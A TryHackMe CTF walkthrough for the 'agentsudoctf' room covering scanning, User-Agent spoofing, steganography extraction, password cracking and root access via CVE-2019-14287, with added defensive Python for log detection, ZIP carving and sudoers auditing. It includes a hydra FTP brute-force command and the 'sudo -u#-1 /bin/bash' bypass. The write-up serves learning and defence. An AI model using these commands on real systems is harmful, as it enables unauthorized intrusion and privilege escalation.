TryHackMe CTF: agentsudoctf (Easy)

Utilizes steganography with binwalk and steghide to extract hidden data from images. Employs zip2john to crack a password-protected archive and Base64 decoding to recover a credential. Achieves privilege escalation by exploiting the CVE-2019-14287 sudo vulnerability.

URL: https://tryhackme.com/room/agentsudoctf   Easy

PHASE 1: Reconnaissance

Description of the room:

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Interesting ports found to be open:

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Also see: nmap.log

Running: gobuster

Ran the following:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://xxx.xxx.xxx.xxx

Interesting folders found:

/index.php            (Status: 200) [Size: 218]

Also see: gobuster.log

Running: nikto

Ran the following:

nikto -h xxx.xxx.xxx.xxx

Interesting info found:

--Nothing really--

Also see: nikto.log

PHASE 3: Gaining Access

There isn’t anything too interesting from scanning. We navigate to the web server running on this host and see:

Dear agents,

Use your own codename as user-agent to access the site.

From,
Agent R

Per the instructions on the main page, you pass your agent codename as the User-Agent header to gain access. Since the note was signed by “R”, we can systematically try the other letters. For example:

curl -H "User-Agent: C" -L http://10.10.13.116

From that response, we can discern the username behind “C”. Since both SSH and FTP are open, let’s try hydra against FTP with:

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.13.116 ftp

Sure enough, from that, we capture the FTP password for user chris.

Also see: hydra.log
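The User-Agent gate above only works because the server trusts a client-supplied header, and anyone probing it will cycle through many short, distinct values from one address. The following Python is an added example written for this writeup (not part of the original room or any tool mentioned here) that parses Apache/Nginx combined-format access log lines and flags clients presenting an unusual number of different User-Agent values. The log lines, addresses and timestamps are constructed for the example.

```python
import re
from collections import defaultdict

# Combined log format as written by Apache and Nginx:
# client ident user [time] "request" status bytes "referer" "user-agent"
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def user_agents_by_client(log_lines) -> dict:
    """Map each client address to the set of distinct User-Agent values it sent."""
    seen = defaultdict(set)
    for line in log_lines:
        m = _COMBINED.match(line)
        if m:
            seen[m.group('ip')].add(m.group('ua'))
    return dict(seen)

def flag_ua_cycling(log_lines, threshold: int = 5) -> list:
    """Return clients that presented at least `threshold` different User-Agents.

    A browser keeps one value for a whole session, so a client rotating through
    many short values in quick succession is almost certainly probing a header check.
    """
    return sorted(ip for ip, uas in user_agents_by_client(log_lines).items()
                  if len(uas) >= threshold)

# Constructed sample log: one client walking through single-letter codenames,
# one ordinary browser visit. None of this is real traffic from the room.
SAMPLE_LOG = [
    f'10.0.0.5 - - [10/Oct/2023:12:00:0{i} +0000] "GET / HTTP/1.1" 200 218 "-" "{ua}"'
    for i, ua in enumerate('ABCDEF')
] + [
    '10.0.0.9 - - [10/Oct/2023:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 218 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/118.0"',
]

if __name__ == '__main__':
    print(flag_ua_cycling(SAMPLE_LOG))   # ['10.0.0.5']
```

The threshold is deliberately low because legitimate clients rarely change the header at all; in a real deployment you would also window the count by time and exclude known crawlers.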

Unprivileged Access

When we log into FTP as Chris, we have 3 files:

We find out from the text file:

Dear agent J,

All these alien like photos are fake! Agent R stored the real picture 
inside your directory. Your login password is somehow stored in the fake 
picture. It shouldn't be a problem for you.

From,
Agent C

By running:

steghide info ./cute-alien.jpg

We find that cute-alien.jpg has password-protected data in it. Using binwalk:

binwalk ./cutie.png

We can see there is a .zip file embedded within:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

So, we can do a:

binwalk -e ./cutie.png

to extract (-e) the hidden .zip file. That puts the embedded data into a _cutie.png.extracted subfolder. Within there, we have some files:

365
365.zlib
8702.zip
To_agentR.txt
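To see what binwalk is doing when it reports “Zip archive data” at an offset and “End of Zip archive, footer length: 22”, here is an added Python example (written for this writeup, not code from binwalk or the room) that carves a ZIP archive out of an arbitrary byte blob by reading the End of Central Directory record and walking the central directory. The PNG prefix and the archive bytes are constructed inside the block; the entry name and sizes are copied from the binwalk output above, and the entry is marked as WinZip AES-encrypted, which is the scheme john later labels “WinZip”.

```python
import struct

# Constructed sample: a fake PNG prefix (108 bytes of filler, not a valid image)
# followed by a hand-built ZIP archive. Only the headers matter here.
FAKE_PNG_PREFIX = b'\x89PNG\r\n\x1a\n' + b'\x00' * 100

def build_sample_zip(name: bytes = b'To_agentR.txt', compressed_size: int = 98,
                     uncompressed_size: int = 86, encrypted: bool = True) -> bytes:
    """Assemble local header + payload + central directory + EOCD for one entry."""
    flags = 0x0001 if encrypted else 0      # general-purpose bit 0 = entry is encrypted
    method = 99 if encrypted else 0         # 99 = WinZip AES, 0 = stored
    payload = b'\x00' * compressed_size     # placeholder ciphertext, never decrypted here
    local = struct.pack('<IHHHHHIIIHH', 0x04034b50, 20, flags, method, 0, 0,
                        0, compressed_size, uncompressed_size, len(name), 0) + name
    central = struct.pack('<IHHHHHHIIIHHHHHII', 0x02014b50, 20, 20, flags, method, 0, 0,
                          0, compressed_size, uncompressed_size, len(name),
                          0, 0, 0, 0, 0, 0) + name
    cd_offset = len(local) + len(payload)   # central directory offset, relative to archive start
    eocd = struct.pack('<IHHHHIIH', 0x06054b50, 0, 0, 1, 1, len(central), cd_offset, 0)
    return local + payload + central + eocd

def carve_zip(blob: bytes) -> dict:
    """Locate a ZIP archive embedded anywhere in `blob` and describe its entries.

    Starts from the End of Central Directory record (signature PK\\x05\\x06, 22 bytes
    when it carries no comment), the same footer binwalk reports above.
    """
    eocd = blob.rfind(b'PK\x05\x06')
    if eocd < 0:
        raise ValueError('no End of Central Directory record found')
    _, _, _, _, n_entries, cd_size, cd_offset, _ = struct.unpack_from('<IHHHHIIH', blob, eocd)
    cd_start = eocd - cd_size
    # cd_offset is relative to the archive start, so the difference between where the
    # central directory really is and where the archive claims it is equals the length
    # of whatever precedes the ZIP (here, the PNG data).
    zip_start = cd_start - cd_offset
    entries = []
    pos = cd_start
    for _ in range(n_entries):
        f = struct.unpack_from('<IHHHHHHIIIHHHHHII', blob, pos)
        if f[0] != 0x02014b50:
            raise ValueError('corrupt central directory')
        flags, method, csize, usize = f[3], f[4], f[8], f[9]
        fnlen, extralen, commentlen = f[10], f[11], f[12]
        name = blob[pos + 46:pos + 46 + fnlen].decode('utf-8', 'replace')
        if method == 99:
            encryption = 'WinZip AES'          # what john's "ZIP, WinZip" format targets
        elif flags & 0x0001:
            encryption = 'ZipCrypto (legacy)'  # weak stream cipher, known-plaintext attackable
        else:
            encryption = 'none'
        entries.append({'name': name, 'compressed_size': csize, 'uncompressed_size': usize,
                        'encryption': encryption, 'local_header_offset': zip_start + f[16]})
        pos += 46 + fnlen + extralen + commentlen
    return {'zip_offset': zip_start, 'eocd_offset': eocd,
            'archive': blob[zip_start:eocd + 22], 'entries': entries}

if __name__ == '__main__':
    report = carve_zip(FAKE_PNG_PREFIX + build_sample_zip())
    print(hex(report['zip_offset']), report['entries'])
```

The `archive` bytes returned are exactly what `binwalk -e` writes out as the `.zip` file; the encryption field tells you up front whether a recovered archive uses WinZip AES (slow PBKDF2, so brute force is costly) or legacy ZipCrypto.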

The .zip file seems to be password-protected, so we can send that to John to crack:

zip2john ./8702.zip > ./8702.zip.hash

and then:

john ./8702.zip.hash

and very quickly, John finishes with the .zip file password:

Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
alien            (8702.zip/To_agentR.txt)

Also see: john.log


Now that we have the .zip file password, we can unzip the contents:

7z e ./8702.zip

We enter the password and To_agentR.txt gets extracted. The contents give us a perhaps-encoded word:

Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R

Using a website like https://www.base64decode.org/, we can pass in the value QXJlYTUx and get the value Area51.
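Pasting recovered data into a third-party website is a habit worth breaking, since CTF strings are harmless but real case material is not. The following Python is an added example (not part of the original writeup) that does the decoding offline and goes a step further than the single string above: it scans a whole text for Base64-looking tokens, validates them strictly, and keeps only those that decode to printable ASCII, so ordinary words that happen to fit the Base64 alphabet are discarded. The note text is a constructed copy of the one recovered from the archive.

```python
import base64
import binascii
import re
import string

# Candidate tokens: Base64 alphabet only, with optional '=' padding. The length
# check lives in the function because Base64 output is always a multiple of 4.
_TOKEN = re.compile(r'[A-Za-z0-9+/]+={0,2}')
_PRINTABLE = set(string.printable) - set('\x0b\x0c')

def find_base64_tokens(text: str, min_len: int = 8) -> dict:
    """Return {token: decoded} for each token that is valid Base64 and decodes to printable ASCII."""
    found = {}
    for token in _TOKEN.findall(text):
        if len(token) < min_len or len(token) % 4:
            continue
        try:
            raw = base64.b64decode(token, validate=True)   # reject stray characters and bad padding
            decoded = raw.decode('ascii')
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue   # e.g. "possible" is valid Base64 but decodes to non-ASCII bytes
        if decoded and all(ch in _PRINTABLE for ch in decoded):
            found[token] = decoded
    return found

# Constructed copy of the note extracted from To_agentR.txt.
NOTE = """Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R
"""

if __name__ == '__main__':
    print(find_base64_tokens(NOTE))   # {'QXJlYTUx': 'Area51'}
```

Lower `min_len` if you expect very short encoded values, at the cost of more false positives from plain English words.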

We might assume that is the steg password for the other image. We try that:

steghide extract -sf ./cute-alien.jpg

That writes its contents to message.txt, which is addressed to james and appears to contain his password.

Let’s try that username/password over SSH - and sure enough, we can log in and get the user flag, and the picture for the bonus question.

Privilege Escalation

We check to see if we have any sudo privileges with sudo -l and we see an odd:

(ALL, !root) /bin/bash

By looking this up on the internet, we find the associated CVE-2019-14287.

To run the exploit, instead of the intuitive:

sudo /bin/bash

Per the CVE writeups, you’d do the following to get a root prompt:

sudo -u#-1 /bin/bash

This gives you a root prompt. From there, we can get the root flag from /root/root.txt and complete the room.
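From the defender's side, the two things that make this escalation possible are a sudo build older than 1.8.28 (the release that fixed CVE-2019-14287) and a Runas specification written as ALL with a “!root” exclusion. The following Python is an added example (written for this writeup, not part of the room or of sudo) that audits both: it parses the version out of `sudo -V` output and scans sudoers text for rules of that shape. The sudoers content and version strings below are constructed; the room's actual sudo version is not given in the writeup.

```python
import re

# CVE-2019-14287 was fixed in sudo 1.8.28. Older builds let a Runas rule of the
# form (ALL, !root) be bypassed by asking for user id -1, as shown above.
FIXED_VERSION = (1, 8, 28)

# user  host=(runas_users[:runas_groups])  command
_RUNAS_RULE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>.*)$'
)

def parse_version(sudo_v_output: str) -> tuple:
    """Turn the first line of 'sudo -V' (e.g. 'Sudo version 1.8.21p2') into (1, 8, 21)."""
    m = re.search(r'(\d+)\.(\d+)\.(\d+)', sudo_v_output)
    if not m:
        raise ValueError('no sudo version number found')
    return tuple(int(part) for part in m.groups())

def risky_runas_rules(sudoers_text: str) -> list:
    """Return rules whose Runas user list is ALL minus some '!'-excluded users."""
    risky = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = _RUNAS_RULE.match(line)
        if not m:
            continue   # Defaults lines, aliases, includes: not Runas rules
        runas_users = m.group('runas').split(':', 1)[0]   # drop the optional group list
        users = [u.strip() for u in runas_users.split(',')]
        if 'ALL' in users and any(u.startswith('!') for u in users):
            risky.append({'user': m.group('user'), 'runas': m.group('runas'),
                          'command': m.group('cmd').strip()})
    return risky

def assess(sudo_v_output: str, sudoers_text: str) -> dict:
    """Combine the version check with the rule scan into one verdict."""
    version = parse_version(sudo_v_output)
    rules = risky_runas_rules(sudoers_text)
    return {'version': version, 'patched': version >= FIXED_VERSION, 'rules': rules,
            'exploitable': version < FIXED_VERSION and bool(rules)}

# Constructed sudoers content: the rule 'sudo -l' showed above plus two ordinary ones.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample, not the room's real file)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
james   ALL=(ALL, !root) /bin/bash
"""

if __name__ == '__main__':
    # Assumed version string; substitute the real output of `sudo -V` on the host.
    print(assess('Sudo version 1.8.21p2', SAMPLE_SUDOERS))
```

The fix is both halves: upgrade sudo to 1.8.28 or later, and rewrite such rules to name the accounts the user is actually allowed to run as, rather than granting ALL and trying to subtract root.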